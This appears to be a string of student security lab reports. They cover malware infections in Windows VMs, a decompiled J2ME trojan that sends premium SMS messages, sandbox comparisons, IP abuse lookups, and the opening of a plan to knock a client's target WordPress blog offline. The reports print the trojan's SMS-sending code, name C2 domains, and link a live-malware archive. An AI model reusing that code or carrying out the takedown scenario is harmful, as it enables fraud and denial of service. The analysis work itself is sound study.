Intense detail information are highlighted bellow and MD5 sum for Win1 virtual box
machine:
OS: Ms Windows 7 Professional
Version: 6.1.7601 Service Pack 1 Build 7601
System type: 32 bit
Computer name: DoeM
Users Names:

• Jane Doe
• Jhon Doe

MD5 Sum: 6313cf7303de37ba62aadf5208b6ea78

Analysis

The analysis starts firstly from the observations, then with an supporting figures, sample of
identification, are there any dependencies and in closer with summary of the analysis.
From analysis with a different tools we came to conclusion that the above virtual
image it is infected with some malicious code. Were certain tools have provides as an information that there is background accessing to network. However, this analysis it is not enough so therefore we will do more inside investigation to come-out with the hosts or network that the malicious code is trying to access, or an information that is shared.

To be able to identify the behaviour of a network we have used the Wireshark tool.
Bellow are highlighted the steps: Network adapter type: NAT, logged in as: John Doe,
additionally Wireshark run as Administrator. Upon the testing, the only user application
open on WIN1 is Notepad. No additional network activities from log-in user, also no
network activities from user on Host System. Wireshark, it detected suspicious traffic:

1. Classification: BAD TCP (according to Wireshark coloring rules), Destination: 192.168.0.254 / 8.8.4.4 (Googne Public DNS) with Protocol: DNS; Info: Standard query A mamtumbochka766.ru / Standard query A followmego12.ru / Standart query A losokorot7621.ru / standard query A hidemyfass87111.ru /; Reason for classification as BAD TCP: Header checksum incorrect, maybe caused by “IP checksum offload”, Message: Bad Cheksum, Severity level: Error
2.  As a response, WIN1 machine got UDP packet (according to Wireshark coloring rules); Protocol: DNS; Info: Standard query response, Sever failure.
3. Additionally, Wireshark detected another round of BAD TCP packets; Classification: BAD TCP; Destination: 195.226.218.135; Protocol: TCP; Port: 50530; Info: HTTP ACK (before that, WIN1 sent ACK message, got SYN ACK and this packet was an ACK). Where during HTTP session, WIN1 machine received the following linebased text data: i5eOnJKV57mp5biuqK+0tri0tbW+uK+0qeDr57mp5b29uL6pr7ypurm5vqng6+e 5qeU=; Then WIN1 received FIN ACK message from server and send ACK and FIN  ACK. Session was finished.

The session was repeated once in 3 minutes and received line-based text data, for
all sessions was the same. For illustration please refer to the following link for more details
of pcap life of wireshark: http://bit.ly/mDdqAQ.

Additional log files and screen shots are presented bellow during the analysis with
other tools that are listed in the sections of tools.

Illustration 1: TCPView tool, YGLA.ru access to domain

Furthermore, log illustration of hijackThis tool:

Logfile of Trend Micro HijackThis v2.0.4
Scan saved at 20:35:44, on 27.11.2011
Platform: Windows 7 SP1 (WinNT 6.00.3505)
MSIE: Internet Explorer v8.00 (8.00.7601.17514)
Boot mode: Normal
Running processes:
C:\Windows\system32\taskhost.exe
C:\Windows\system32\Dwm.exe
C:\Windows\Explorer.EXE
C:\Windows\System32\VBoxTray.exe
C:\Windows\system32\SearchProtocolHost.exe
C:\Windows\system32\taskmgr.exe
C:\Users\Jhon Doe\Desktop\HijackThis.exe
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page =

http://go.microsoft.com/fwlink/?LinkId=54896

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL =

http://go.microsoft.com/fwlink/?LinkId=69157

R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL =

http://go.microsoft.com/fwlink/?LinkId=54896

R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page =

http://go.microsoft.com/fwlink/?LinkId=54896

R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page =

http://go.microsoft.com/fwlink/?LinkId=69157

R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant =
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch =

R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName =

F3 - REG:win.ini: load=C:\Users\JHONDO~1\LOCALS~1\Temp\5b17fff70008a4e8.exe
O4 - HKLM\..\Run: [VBoxTray] C:\Windows\system32\VBoxTray.exe
O23 - Service: FJOSKX - Sysinternals - www.sysinternals.com -
C:\Users\JHONDO~1\AppData\Local\Temp\FJOSKX.exe
O23 - Service: Remote Packet Capture Protocol v.0 (experimental) (rpcapd) - CACE
Technologies, Inc. - C:\Program Files\WinPcap\rpcapd.exe
O23 - Service: SUUKATRPY - Sysinternals - www.sysinternals.com -
C:\Users\JHONDO~1\AppData\Local\Temp\SUUKATRPY.exe
O23 - Service: VirtualBox Guest Additions Service (VBoxService) - Oracle Corporation -
C:\Windows\system32\VBoxService.exe

Alternatively, we turn to Process Explorer and Process Monitor from Sysinternals. In
spite of comprehensive information and some suspicious activities, these tools were
unable to show direct link to malware. We analyzed some suspicious DLLs and .exe files,
but all of them appeared to be legitimate Windows files. Also ee turned to Security Task
Manager by Neuber Software where it discovered file 061afffa0005f9e5.exe in
C:\Users\JHONDO~1\LOCALS~1\Temp folder. Usually malware runs itself or is hidden in
Temp folder. So weird name and location give us enough reason to think it’s malware.
Additional information provided by Security Task Manager: Company: Not provided;
Type: Program. Hidden; Starts: when Windows starts and Registry: win.ini.

Meanwhile, for advance analysis we have conduct with clean boot which is
explained into the KB article in the following link: http://support.microsoft.com/kb/929135.
Now we run the wireshark analysis network tool, where no more suspicious network traffic
is identified. This means that the malicious code is running from 3rd party applications and
not from Microsoft services or process.

Likelihood, to be able to identify the malicious code, threads in virtual machine, we
recommend to run an online free virus scanning. Thus process is done by ESET free
online tool scanning, refer to the following link: http://www.eset.com/us/online-scanner/.
The aim of this step is to help to identify if the threads have been registered in to the virus
signature database. If so, this will be a useful information and will assist to continue with
analysis.

Eset Online scanner, found 20 threads:

C:\$Recycle.Bin\S-1-5-21-1301155936-2652204530-896827088-1000\$RIZWMML\spyeye-
1.2.60\c39bb188f2ac6534e75c6d961b9a78a2 Win32/Spy.SpyEye.BY trojan cleaned
by deleting - quarantined
C:\$Recycle.Bin\S-1-5-21-1301155936-2652204530-896827088-1000\$RIZWMML\spyeye-

1.2.99\92bf8b3eb04be42f6aba05d6b97e8f25 Win32/Spy.SpyEye.BY trojan cleaned
by deleting - quarantined
C:\$Recycle.Bin\S-1-5-21-1301155936-2652204530-896827088-1000\$RIZWMML\spyeye-
1.3.10\21da6142e3cd3979b7ef122ee638c78f a variant of Win32/Kryptik.MKM trojan
cleaned by deleting - quarantined
C:\$Recycle.Bin\S-1-5-21-1301155936-2652204530-896827088-1000\$RIZWMML\spyeye-
1.3.25\7822bbf0c8ea3e9a75a19e954a39d6c9 Win32/Spy.SpyEye.CA trojan cleaned
by deleting - quarantined
C:\$Recycle.Bin\S-1-5-21-1301155936-2652204530-896827088-1000\$RIZWMML\spyeye-
1.3.31\2bed4bbed303c91e2169b2f32db46acb.exe Win32/Spy.SpyEye.CA trojan cleaned
by deleting - quarantined
C:\$Recycle.Bin\S-1-5-21-1301155936-2652204530-896827088-1000\$RIZWMML\spyeye-
1.3.32\1686b7e48871dd715336c732cfc32c1d Win32/Spy.SpyEye.CA trojan cleaned
by deleting - quarantined
C:\$Recycle.Bin\S-1-5-21-1301155936-2652204530-896827088-1000\$RIZWMML\spyeye-
1.3.34\b2c3acf99f68c42626cf345b74095d51 a variant of Win32/Spy.SpyEye.CA trojan
cleaned by deleting - quarantined
C:\$Recycle.Bin\S-1-5-21-1301155936-2652204530-896827088-1000\$R387J1S IRC/SdBot
trojan cleaned by deleting - quarantined
C:\$Recycle.Bin\S-1-5-21-1301155936-2652204530-896827088-1000\$R6TYLIY a variant of
Win32/Kryptik.KUQ trojan cleaned by deleting - quarantined
C:\$Recycle.Bin\S-1-5-21-1301155936-2652204530-896827088-1000\$R8Y8LWG Win32/Pepex.E
worm cleaned by deleting - quarantined
C:\$Recycle.Bin\S-1-5-21-1301155936-2652204530-896827088-1000\$RD4Q6CZ
Win32/AutoRun.IRCBot.FC worm cleaned by deleting - quarantined
C:\$Recycle.Bin\S-1-5-21-1301155936-2652204530-896827088-1000\$RI87EEE
Win32/AutoRun.KS worm cleaned by deleting - quarantined
C:\$Recycle.Bin\S-1-5-21-1301155936-2652204530-896827088-1000\$RIJ4S9U a variant of
Win32/Kryptik.KUQ trojan cleaned by deleting - quarantined
C:\$Recycle.Bin\S-1-5-21-1301155936-2652204530-896827088-1000\$ROFILPO probably a
variant of Win32/Autorun.MHBFUDT worm cleaned by deleting - quarantined
C:\$Recycle.Bin\S-1-5-21-1301155936-2652204530-896827088-1000\$RQNEZXA Win32/Pepex.F
worm cleaned by deleting - quarantined
C:\$Recycle.Bin\S-1-5-21-1301155936-2652204530-896827088-1000\$RU9MNXT IRC/SdBot
trojan cleaned by deleting - quarantined
C:\$Recycle.Bin\S-1-5-21-1301155936-2652204530-896827088-1000\$RY4NX2I IRC/SdBot
trojan cleaned by deleting - quarantined
C:\$Recycle.Bin\S-1-5-21-1301155936-2652204530-896827088-1000\$RY6CB6A
Win32/AutoRun.KS worm cleaned by deleting - quarantined
C:\Bios.Bin\Bios.Bin.exe a variant of Win32/Injector.FPL trojan cleaned by deleting -
quarantined
C:\Users\Public\Videos\Sample Videos\moos.exeIRC/SdBot trojan cleaned by deleting -
quarantined

Each virus definition is presented bellow in the following table with the description
link:

From the above table we can come to the conclusive proof that total sum number of
malicious code running in the virtual machine are 20, with an 9 different definitions of
trojan, warms, etc. However, most of them were located in to the Recycle bin folder.
Additionally to the analysing packets with Wireshark showed that Win1 has some malware, which sent and received some information over network without knowledge of the user. Destination IP addresses, names and port numbers were suspicious.

Disinfection

Indeed, this virtual machine it is infected. Therefore we have to perform an disinfection
process. However, from the above table of the links it provides an solution and steps that
should be followed for disinfection process. Either with an tool or steps for removing the
malicious code. Also, we can remove the files with some additional tools that are available
for free, for instance Eraser tool. Now that we know the exact location of each infected file
it is much easier and simple to be able to delete, remove the files from our system.
Although we could use the Eset scanner tool that we have performed previously.
Nevertheless, to be sure and more save way is to do the removing process manually.

Therefore, recommendation for deleting the malicious code of all time from virtual
machine is eraser tool. You need to configure task and which folders or files you specify to
be removed. After the task was completed, restart the machine and now the system should be disinfected and additional we recommend to run the Eset online scanner free tool one more time, just in case in a meaner of your organization.

 Win2

Intense detail information are highlighted bellow and MD5 sum for Win2 virtual box
machine:
OS: Ms Windows 7 Professional
Version: 6.1.7601 Service Pack 1 Build 7601
System type: 32 bit
Computer name: DoeM
Users Names:

• Jane Doe
• Jhon Doe

MD5 Sum: 155a5b9e8b842dff4aa5a7b4361113d3

Analysis

Despite the fact that Process Monitor, TCPView and other Sysinternals Suite analysis tools did not help us at all (also Wireshark did not detect any suspicious network activities), at this point, additionally registry changes were detected with CaptureBat tool, where the log file will be presented in figure 2. However by running the ESET online free scanner tool, it did detect in total three threads to our virtual machine, logs are presented bellow.

Eset Online Scanner, found 3 threads:

C:\$Recycle.Bin\S-1-5-21-1301155936-2652204530-896827088-1001\$RKV8ZW1.exe
Win32/Duqu.A trojan
C:\Users\Jane\AppData\Local\Temp\0004fbd1.tmpa variant of Win32/Kryptik.VFI trojan
C:\Users\Jane\AppData\Local\Temp\b01dffe3001c4fe2.exe
Win32/TrojanDownloader.Agent.QXN trojan

Threads are located in to the system directory of Jane user name. Additionally, there
is an other malicious code located into the Recycle bin as we were able to detect into the
previous analysis for Win1 virtual machine. In spite of fact that in previously scenario we
had only a threads located into Recycle Bin, at this virtual environment we have as an local
files. Therefore to be able to identify the above file and there integrity we have to sum the MD5 and SHA256 algorithms. For this action we are using an online tool winMd5Sum.

For advance analysis, we will run the MD5Sum into the virustotal.com search to
identify the threads. Indeed, all of the above have been reported previously as a malware.
Meanwhile, to gather better description of the above malicious codes we will search the
definitions in the Eset database and descriptions provided in the following table.

Illustration 2: CaptureBAT, win2, registry changes

Figure 2 is just a part of the log files that were able to be capture of the CaptureBAT tool, as we can see form the above that many changes were effected over the registries. Therefore, we need to run either an registry system check or as we know the location of the malicious code, with OllyDbg we can run the files and inspect there behaviour and if they have any additionally affect over the memory dump, etc. presented in figure 3.

Illustration 3: OllyDbg analysis, memory dump, system dll access, etc.

Nevertheless, because now we have the locations and the threads description it is
next step to disinfected the system, yet it is still a big thread for the organization, etc.

Disinfection

As on the previously scenario, we recommend either to use the Eset online free scanner or to use in more convinced way the Eraser tool, for removing the malicious code from the
machine forever. Furthermore, to just make sure that the above malicious code is
removed, disinfected from our system still recommendations is to run the Eset tool for a
second time, for double check the system.
All the above files and threads could be a very harmful for the organization and for
everyday production work. Therefore, advance analysis of the system it is always in hands
to help us to protect our data, internet access, etc. of being leaked.

Tools

Tools that help for conducting the results are highlighted in this section. Those are just few
of them that are available for this purpose. Nevertheless, we have use only the listed ones.
Tools and downloadable links:

• CaptureBAT: http://www.honeynet.org/node/315
• Most of the tools that are used for this laboratory report are Sysinternals Suite: http://technet.microsoft.com/en-us/sysinternals/bb842062
• Advance report: HijaskThis: http://free.antivirus.com/hijackthis/
• Wireshark: http://www.wireshark.org/
• ESET Free Online Scanner: http://www.eset.com/us/online-scanner/
• Eraser: http://www.heidi.ie/eraser/
• Virustotal: http://www.virustotal.com/
• Security Task Manager: http://neuber.com/taskmanager/index.html
• OllyDbg v1.10: http://www.ollydbg.de/
• WinMD5Sum: http://www.nullriver.com/products/winmd5sum

SUMMARY

The goal of this post is to identify and analyze mobile malware file: mmc.jar. Thereby please follow the following steps for completing the task:

• Unpack the file (hint – using zip on .jar)
• Examine .class files using tool available here (local copies for Mac, Linux, Win)
• Find code sending SMSes using ‘sms://’ URI
• Calculate short number used in SM.send
• Finally for compiling the code use the developing tool Eclipse IDE.

ANALYSIS

After running the decompiler tool we are examining and analyzing the Java source code. Whereby on the source code on the class M.class line 343 we have found the following source code:

if ((i >= 35) &amp;amp;&amp;amp; (SM.isSending != true) &amp;amp;&amp;amp; (i % 6 == 0) &amp;amp;&amp;amp; (f < count_query)) {
  if (SM.GS()) f += 1;
   if (f == 1) {
            RS.L(rs);
            RS.L("Slide");
            rs = RS.j("Slide");
            game = RS.L(rs, Integer.toString((int)(System.currentTimeMillis() / 1000L)));
            RS.L(rs);
   }if (f < count_query) {
  game = SM.send("sms://" + ms[1][b], ms[2][b]); // sms://
  if (b == count_query) b = 1; else b += 1;
}

public static int send(String s, String s1)
{
   if (isSending) return 0;
      new SM(s, s1);
   return -1;
}
public SM(String s, String s1) {
 success = false;
 isSending = true;
 this.destination = s;
 this.message = s1;
 try {
      Thread thread = new Thread(this);
      thread.start();
 }
 catch (Exception exception) {
 isSending = false;
}

/0SIF|6XI8ULE|YNLD5QDA6WM|YJ90RL/+WPJDAFY2 DC3QJ/+3RKA/5YPA0MD-5QFD
while 7375/88600168904|7202/65510006691|1899/FTEME 1283|8385/88600168904|
1 16
2 33
3 49
4 66
7375 88600168904 //sms://7375
7202 65510006691 //sms://7202
1899 fteme 1283 //sms://1899
8385 88600168904 //sms://8385
decoded
36
7375 88600168904
42
7202 65510006691
48
1899 fteme 1283
54

Task

Write a regular expression for matching the names which follow the following rules:
1) Each name consists of one or more parts. If there are two or more parts, they are separated either with a single space (” “) or dash (“-”) character.
2) Each name part must consist of letters only. The name part must begin with an upper-case letter which are followed by one or more lower-case letters. Each name part can  have an optional prefix which begins with an upper-case letter, followed by one or more lower-case letters.

Solution

^([A-Z][a-z]+([A-Z][a-z]+)?(\s|-))*[A-Z][a-z]+([A-Z][a-z]+)?$

For completing the task, we are dividing into several sub-tasks.

Firstly, we had to find expression, which satisfies the first requirement of the task: representing one or more parts, which can be separated either with space (“ “) or dash (“-”). Thereby, we can represent space and dash with the following expression (\s|-).

If the entry is just one legitimate part (without space or dash after), (\s|-) has 0 occurrences. Yet the entry may consist of many legitimate parts divided by spaces or dashes. The expression should be (\s|-)*.

As for the legitimate parts, we have to write expression considering second part of requirements.

Legitimate part should consist of letters only, begin with (only one) uppercase letter and followed by one or more lowercase letters. Legitimate part can have prefix beginning with (only one) uppercase letter, followed by one or more lowercase letters.

Therefore, [A-Z][a-z]+ represents the entry which begins uppercase letter and is followed by one or more lower case letters. In addition, to represent prefix, which occurs either 0 or 1 time, we will have the following expression: ([A-Z][a-z]+)?. Moreover, to represent the whole legitimate entry, we merge the two expressions (it does not matter whether prefix expression comes first) with: A-Z][a-z]+([A-Z][a-z]+)?. Thus with this expression we go back to (\s|-)* where putting [A-Z][a-z]+([A-Z][az]+)? into parentheses with (\s|-) and take * outside of parentheses (as this whole expression) legitimate part with either space or dash should be presented for 0 or more consecutive times.

(([A-Z][a-z]+([A-Z][a-z]+)?(\s|-))*

To be able to exclude entries, which end with “-”, we add expression of legitimate part. and add “^” and “$” respectively at the beginning and the end of expression, to mark the  beginning and an end of the string.

^(([A-Z][a-z]+([A-Z][a-z]+)?(|s|-))*([A-Z][a-z]+([A-Z][a-z]+)?$

Finally, we have the whole expression we have to test it (we have to put the expression in quotation marks).

egrep ‘^([A-Z][a-z]+([A-Z][a-z]+)?(\s|-))*[A-Z][a-z]+([A-Z][a-z]+)?$’ <file_name>

The above solution is written by: Predrag Tasevski and Mikheil Basilaia

The main goal of laboratory report is to identify three analyses of malware files from the
archive file send by the lecture. The archive contains 89 malware files. The way how we
choice 3 files is by following algorithm:
1. Soft them by name
2. First use last number of your student code + your birthday day
3. Second, generate random number from http://www.random.org/ and only if it does not match first number use it for choosing the file
4. Third, use random number generator again and if it does not match first or second
number use it.
Malware archive can be download from the following link:
https://sim.cert.ee/hw/pahadus.zip

WARNING FILE CONTAINS LIVE VIRUSES

Task that need to be complete for this laboratory assignment:
• Pick your malware
• Run your malware against 2 of next online analysis tools
◦ http://www.virustotal.com/
◦ http://camas.comodo.com/
◦ http://www.threatexpert.com/submit.aspx
• Find additional 2 online analysis tools where to analyse virus
Things that should be presented in the laboratory report are:
• Chosen numbers
• General information about malware
◦ name
◦ md5
◦ sha1
• link to analysis result if it is possible
• link to disinfecting instructions – if not possible explanation why it is not
• Analysis tools – links
• Your opinion about each analysis tool and comparison results.
Firstly, we are going to analyse the chosen files in section Chosen files and each file
with the above required information and detail analysis results, links to disinfecting
instructions, analysis tools used for this purpose. Secondary, expression about each
analysis tool used and comparison results will be presented in section Analysis. In
addition, in section Appendixes its provides what virtual environment has been used for
this laboratory report. Because we know that if we open this file in our real machine we will
get infected. That is why we are using an Linux virtual environment.
Furthermore, each file will be analysed with two different tools, in case to gather
more information and solution for disinfecting process.
Finally the conclusion made of all collected data will be concise in conclusion
section.

CHOSEN FILES

Number of files are listed bellow and the name of the file that is going to be analysed:
1. Number: 71; File name: sales.exe; Size: 454.7 KB
2. Number: 57; File name: mgre.exe; Size: 61.4 KB
3. Number: 60; File name: moos3.ee; Size: 91.6 KB

FILE 1

File name: sales.exe; Size: 454.7 KB; Number: 71.
MD5: 093e72cbc78b46e977561c5874cfab4c
SHA1 Hash: e79a730b01b6689c336138f39c79fbd2ea45b6c1
SSDeep Hash: 12288:2Pqr7eKhHvZ3NSYqHMsD+vgp0pQe1lhJ:283vhN1qHMsD+Ip8QEz
Links to analyse report:
1. http://www.netscty.com/report/690/e12093ea-3ae7-4fac-a 218-5721b1aabded-347
2. http://www.virustotal.com/file-scan/report.html?
id=6f47a1f72fa005900f40803ede1a2a55167e641011271b49543eef748ffcb5a1-
1318408947#
The above malware file has been reported that is capable to send out e-mail
message with the built in SMTP client engine. Second, it contains characteristics of
Waledac, a worm that spreads by sending an e-mail containing links to copies of itself. And finally, creates a startup registry entry.
Links provided, are demonstrating which anti virus software/application can
disinfected the malware infection.
Tools for analysing the malware are:
1. Netscty – Online Sandbox: http://netscty.com/malware-tool
2. Virustotal.com – http://www.virustotal.com/index.html

FILE 2

File name: mgre.exe; Size: 61.4 KB; Number: 57.
MD5: 1375a8e437db6acafe2b0419cfbff7ec
SHA1:b48f702a5a0fa8558c278dd97ecfbd0d637fefd3
SHA256: 89294d70e80547aac5b506915d2e8fc0309c0e578ab16fc9875c9a4668e63709
Links to analyse report:
1. http://camas.comodo.com/cgi-bin/submit?
file=89294d70e80547aac5b506915d2e8fc0309c0e578ab16fc9875c9a4668e63709
2. http://wepawet.iseclab.org/view.php?
hash=1375a8e437db6acafe2b0419cfbff7ec&type=js
From above analysed links we can conclude that the file creates keys, it changes values in registry, it change only one file, creates process called sample.exe and adds value to the modules.
The links do not show any way of disinfecting the following malware file. My personal opinion of the above links is good that they can show you that this file is malware, but still they do not show you enough information. Which can help you for further instructions and actions that should be consider. Not even providing you an information or
links which anti virus software can help you.
Tools for analysing the malware are:
1. Comodo Instant Malware Analysis – http://camas.comodo.com/
2. Wepawe – http://wepawet.iseclab.org/

FILE 3

File name: moos3.exe; Size: 91.6 KB; Number: 60.
MD5: 4ddade6548142d5fd5b742f34b71e1da
SHA-1: 5345bdd52591b0fcd8e9a81fed7a7b588e24a15d
Links to analyse report:
1. http://anubis.iseclab.org/?
action=result&task_id=13e22805d763a08d4d158904eae5e709d&format=html
2. http://www.threatexpert.com/report.aspx?
md5=4ddade6548142d5fd5b742f34b71e1da
The malware file, contains characteristics of an identified security risk. Possible
security risk is Backdoor.Agent.AJU [Backdoor.Agent.AJU]. The threat category is
network-aware worm and malicious trojan horse. Its modifying file system, memory and
registry. The origin of this malware indicates possible country, Russian Federation.
From the reports we can conclude that most of the known anti virus software has hit
of this malware infection and it can disinfected.
Tools for analysing the malware are:
1. Anubis: Analyzing Unknown Binaries – http://anubis.iseclab.org/
2. ThreatExpert – http://www.threatexpert.com/

ANALYSIS

The web tool that we have used to analysis three of random chosen files are listed bellow.
Moreover, we will compare each one of those service, what kind of information they show,
provide and do they supply with disinfected solution, if so how, and why not.
1. Netscty – Online Sandbox: http://netscty.com/malware-tool
2. Virustotal.com – http://www.virustotal.com/index.html
3. Comodo Instant Malware Analysis – http://camas.comodo.com/
4. Wepawe – http://wepawet.iseclab.org/
5. Anubis: Analyzing Unknown Binaries – http://anubis.iseclab.org/
6. ThreatExpert – http://www.threatexpert.com/
To compare our results from the above list of online analysing tools I have setup an
score from 1 to 5 of each section. Where the highest score is better solution. With the
following attributes:

The above table give as an perfect over view, which tool is easy to use, provides enough information, disinfected information and gain the highest mark.

CONCLUSION

I would like to generalize that from the above information we see that each online analysing tool has own means, criteria and different information to distribute. On the whole, some of them were not that easy and simple to use, yet they provide as with expectant information and disinfected solutions. Therefore, our succeeder for this test is ThreatExpert. But bear in mind that I have not measure and compare all the online tool-kits for analysing the files, just the ones listed in the previous section. For furthermore, please refer to the following article that was publish in 2010 by Lenny Zeltser [MalwareAnalysisToolkit].
In summary, we found out that the chosen files are malware. Likewise, can harm
our computer in different methods. Yet we got an information for some, for instance how to
disinfected the computer. Therefore, we made a comparison table to scale the best online
analysing tool for malware. Where total number is 6 tools, and different score rank. The first one is TheratExpert, secondly is Virustotal.com and the third is Netscty. Still all of mentioned tools score difference with one point.

APPENDIXES

Appendix 1 is configuration of the virtual environment.

APPENDIX 1

Virtual environment: Oracle VirtualBox Version 4.1.2 r73507. Downloadable from the
following link: https://www.virtualbox.org/wiki/Downloads
Security Fedora 14 32 bit – Client: http://spins.fedoraproject.org/security/
• Base Memory: 512 MB
• Acceleration: VT-x/AMD-V, Nested Paging
• Display – Video memory: 12 MB
• Storage: SATA Controller, Port 0: 8 GB
• Network:
◦ Adapter 1: Adapter 1: Parvirtualized Network (NAT)
◦ Adapter 2: Adapter 2: Inter PRO/1000 MT Desktop (Host-only adapter,
„VirtualBox Host- Only Enternet Adapter“)

Bibliography

Backdoor.Agent.AJU: ThreatExpert, ThreatExpert’s Statistics for Backdoor.Agent.AJU [PC Tools], 2011, http://www.threatexpert.com/threats/backdoor-agent-aju.html
MalwareAnalysisToolkit: Lenny Zeltser, 5 Steps to Building a Malware Analysis Toolkit Using Free Tools, January 2010, http://zeltser.com/malware-analysis-toolkit/

The main goal of laboratory report is to identify the responsibilities for the IP addresses
below and how we can make connection to them. IP addresses are randomly chosen by
the lecture.
IP addresses:
1. 69.163.171.238
2. 31.44.184.101
3. 188.72.228.69
External IP that is used for purpose of this test is following: 193.40.244.0/255 1. The ISP that provides this network is EENet2. Organization that is behind is Tallinn Technical University, Estonia. City location is Tallinn and the region is Harjumaa. The phone number of my ISP is: +372 73*****. The e-mail we should report abuse are: first persons that is in charge: Viktor Borisevitch (e-mail: **tor at cc.ttu.ee and phone number: +372-2-****46) and Andres Lepp (e-mail: l*** at cc.ttu.ee and phone number: +372 6 *****55). In addition, if we wont to submit an abuse we should use both persons of network administration and then we can submit and security incident on the following ISP e-mail: turvas@eeenet.ee [RIPE NCC].
All in all, Method 1 and Appendix 1 describes the website, tools and application that
are used to conduct this laboratory report. In addition, Method 2 and Appendix 2 will
introduce website tools and databases where we can check if following IP’s have been
reported before as abuse and security risk. Both methods are represented with answer
and consequences confront in the result section.
Finally the conclusion made of all collected data will be concise in conclusion section of this report.

METHODS

First method describes and demonstrates web tools that have been used to collect the needed information from the stated IP’s addresses. Second method is pointing out website tools and databases that can be applied if the IP has been reported previously as a abuse, spam or security threat.

METHOD 1

Firstly, we need to collect as much as we can details about the IP address. In Appendix 1
is showing the wholly information of the IP’s, contact details, organization name, address,
location, state, country, technicians contact, abuse phone number, abuse e-mail, etc.
Depending on the location of IP we should make sure that not only we know the ISP
or abuse contact details, but we should know national CERT 3 agency that is in charge too.
Therefore, to collect the information we have used different web sites, agencies: [RIPE
NCC][LACNIC][AfriNIC][APNIC][ARIN]. The above reference are agencies collected from
IANA4. Authority responsible for global coordination of the Internet Protocol addressing
systems [IANA].
Moreover, to have more details about the route of the IP’s we are using command
prompt in Windows 7 with the following command, where the results are presented in
Appendix 2 section:

tracert [0.0.0.0]

To illustrate, the details information are presented in Result 1 section.

METHOD 2

After we have collected the wholly information about the concrete IP proposals, we should
check if in addition those IP’s previously have been reported as abused, spam or security
threat. To complete the following method we need to check concrete database system that is offering following service. First that crossed on web is [MalwareURL] which is dedicated to fighting malware, trojans and a multitude of other web-related threats. In addition, we can check if the IP addresses are listed in anti-spam databases. With other words blacklist check [MyIPAddress].

RESULTS

Results from Method 1 are presented in Result 1, further Method 2 is presented in Result
2.

RESULT 1

For each IP are presented only the most important data details that we need to collect for
our goal. In addition, full description and details are presented in Appendix 1. The tables
bellow are illustrating the most important information that we should look-for. In addition,
the highlighted lines are indicating the abuse e-mail box that should be send mail too.

69.163.171.238
OrgName: New Dream Network, LLC
Address: 417 Associated Rd.
Address: PMB #257
City: Brea
StateProv: CA
PostalCode: 92821
Country: US

#technician in charge
OrgTechName: Nagel, Mark
OrgTechPhone: +1-714-706-4182
OrgTechEmail: mna47-arin at dreamhost.com

#abuse in charge
OrgAbuseName: DreamHost Abuse Team
OrgAbusePhone: +1-714-706-4182
OrgAbuseEmail: abuse  at dreamhost.com

From the routing trace we can conclude that the first IP and the third respond and it
did not miss route trace, where in the second IP, 31.44.184.101 there is miss route trace.
That is why we will run this IP address to Method 2. Despite the fact, still we will run the
rest of IP’s in the Method 2, to be trusted that are not in the abuse list.

RESULT 2

Next step is to attempt to search the IP address to check if they have been previously
report as a abuse, trojan, malware, security threat, etc.
To check and verify the security status we are using the service available
[MalwareURL]. Where results for 69.163.171.238 and 88.72.228.69 are with status that
have not been previously reported as abuse. On the other hand, 31.44.184.101 IP address is detected as an security threat before. More details are presented in Appendix 3. Where is demonstrating that the /404.php?type=stats&affid=531&subid=03&iruns has been reported as malicious URL and it is in a blacklist of Google, MyWOT, etc.
Not only that it is listed in the malware database list, but also if we double check on
service [MyIPAddress] that the 31.44.184.101 IP address is listed in few blacklist which is
assess by DNSBL5.

CONCLUSION

In conclusion, I would like to reiterate that the concrete IP’s that we analysis in this report
are demonstrating the process and methods that should be done in future to detect, report
abuse, malware, threat, trojan, security risk, etc. Where we should gather the detail
information, and to whom to turn the abuse. To be precise that are not in blacklist, spam
list, etc.
In spite of following IP’s: 69.163.171.238 and 88.72.228.69, from performing
methods and delivering results are safe and secure, still think can be exploited in easy
manners. The opposite, IP address 31.44.184.101 it has been already report infected as
malicious code from few blacklist providers. When checking the DNS, host name is linking to UK company that deals with IP Transit. For further information please check the
following link: http://www.laveconetworks.co.uk/.
In general, hope that laboratory report and the analyse will help to anyone else to
guide them for future use.

APPENDIXES

Appendix 1 is list of details collected from service. Appendix 2 is trace route details. Where Appendix 3 is the result collected from the black list database.
Because of large content please download [PDF]

Bibliography

RIPE NCC: RIPE NCC, Data & Tools, 2011, https://www.ripe.net/data-tools
LACNIC: Internet Address Registry for Latin America and the Caribbean, REGISTRATION SERVICES , , http://lacnic.net/cgi-bin/lacnic/whois?lg=EN
AfriNIC: AfriNIC LTD, Query the AfriNIC Whois Database, 2011, http://www.afrinic.net/cgi-bin/whois
APNIC: APNIC, APNIC – Query the APNIC Whois Database, 2011, http://wq.apnic.net/apnic-bin/whois.pl
ARIN: ARIN, WHOIS-RWS, 2011, http://whois.arin.net
IANA: IANA, Number Resources, 2011, http://www.iana.org/numbers/
MalwareURL: The MalwareURL Team, The MalwareURL Team, 2011,
http://www.malwareurl.com
MyIPAddress: What Is My IP Address, Blacklist Check, 2011,
http://whatismyipaddress.com/blacklist-check

Footnotes:

1 I will not show my own IP address
2 EENet – http://www.eenet.ee/EENet/
3 CERT – Computer Emergency Response Team
4 IANA – Internet Assigned Numbers Authority – http://www.iana.org/
5 DNSBL – Domain Name System Blacklist

* Changed on purpose, to disclose the exposure

The goal of this laboratory test is to make effort to attack server and to deface website.
Here is the scenario: your client is worried about some stuff posted on a blog. They ask You to take care of it. They have a throwaway “script kiddie”[Script kiddie] in a third world country, who will mount the attack so You don’t need to worry about hiding the attackers identity.
Therefore, we need to devise a way to attack wordpress (default installation) based
site to render it unusable (page view times over 60 seconds). Attack resources: one PC with Microsoft Windows XP, a script kiddie, internet connection of 2Mbit/s. In addition, server has to stay down for two days and script kiddie has up to 1 day to set up the attack.
For scenario above their three different proposals from the fallow students. Each
proposal is described in section Proposals and their effectiveness, installation process and the evaluation of the efficient use of available resources.
Firstly, easy solution for limiting the internet connection of 2Mbit/s by Oracle
